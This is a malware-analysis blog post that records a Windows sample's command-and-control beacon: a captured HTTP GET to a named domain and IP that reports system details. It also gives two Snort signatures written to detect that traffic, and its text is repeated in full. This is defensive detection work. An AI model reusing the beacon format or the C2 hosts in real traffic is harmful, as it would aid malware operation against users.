A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries resolving thebigben.cn:
GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache
After comparing a few captures, the parameters change like this:
act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)
My first signature tries to match the particulars of the parameters with a pcre:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)
This didn't feel like a clean signature so I simplified it to:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)
References:
Virustotal
CWSandbox
ThreatExpert
GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache
After comparing a few captures, the parameters change like this:
act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)
My first signature tries to match the particulars of the parameters with a pcre:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)
This didn't feel like a clean signature so I simplified it to:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)
References:
Virustotal
CWSandbox
ThreatExpert
No comments:
Post a Comment